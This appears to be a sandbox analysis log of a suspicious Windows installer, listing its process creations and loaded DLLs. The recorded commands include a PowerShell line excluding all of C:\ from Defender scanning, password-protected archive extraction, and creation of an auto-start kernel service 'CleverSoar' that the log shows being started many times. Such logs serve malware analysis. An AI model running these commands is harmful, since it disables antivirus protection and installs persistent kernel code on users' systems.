Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: explorerframe.dll Jump to behavior
